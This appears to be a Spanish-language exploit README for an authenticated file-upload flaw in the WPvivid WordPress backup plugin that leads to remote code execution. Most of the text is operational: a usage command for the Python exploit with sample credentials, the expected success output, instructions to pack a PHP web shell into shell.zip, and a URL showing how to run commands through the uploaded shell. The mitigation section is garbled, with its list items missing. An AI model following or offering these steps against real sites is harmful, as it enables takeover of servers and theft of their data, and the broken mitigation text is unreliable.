
Publicado: 2024-10-16 | Migración, Copia de seguridad, Staging – WPvivid <= 0.9.35 - Carga arbitraria de archivos autenticada (suscriptor+)
El plugin WPvivid de WordPress, diseñado para la migración y las copias de seguridad de sitios, es vulnerable a una falla de subida arbitraria de archivos. Esta vulnerabilidad permite a los usuarios autenticados con privilegios bajos subir y extraer archivos ZIP, lo que puede conducir potencialmente a la ejecución remota de código (RCE) si se despliega un script malicioso dentro de los archivos extraídos.
Se ha creado un script de exploit en Python para aprovechar esta vulnerabilidad mediante la siguiente metodología:
Si la explotación es exitosa, el script generará la siguiente salida:
[+] Logged in successfully.
[+] Target is vulnerable. Proceeding with exploitation.
[+] Uploading file: Success
[+] Confirming upload: Success
[+] Starting import: Success
[+] Shell uploaded successfully at: http://target-site.com/wp-content/nxploit.php
Asegúrese de que exista un archivo shell.zip malicioso en el mismo directorio que el script de exploit.
El archivo shell.zip debe contener un web shell en PHP (p. ej., nxploit.php).
Se requiere una cuenta de WordPress válida con privilegios de Suscriptor o superiores.
python CVE-2020-36842.py -u http://target-site.com -un username khaled -p password 123
El script comprobará la versión del objetivo e iniciará sesión con las credenciales proporcionadas.
Si el objetivo es vulnerable, el script subirá shell.zip y lo extraerá.
Si tiene éxito, el script proporcionará una URL al shell subido.
Una vez que el shell se haya subido y extraído correctamente, puede interactuar con él enviando comandos a través de una URL:
http://target-site.com/wp-content/nxploit.php?cmd=pwd
Para mitigar esta vulnerabilidad, se recomienda encarecidamente:
wp-content/uploads mediante .htaccess o configuraciones del servidor.Esta vulnerabilidad presenta un riesgo grave, ya que permite a atacantes autenticados subir y ejecutar archivos maliciosos en un servidor WordPress. Los administradores del sitio deben tomar medidas inmediatas para asegurar sus instalaciones.
Aviso Legal: Este documento está destinado únicamente a fines de investigación de seguridad ética y educativos. Explotar vulnerabilidades sin permiso es ilegal y está penado por las leyes aplicables. ( Nxploit | Khaled_alenazi )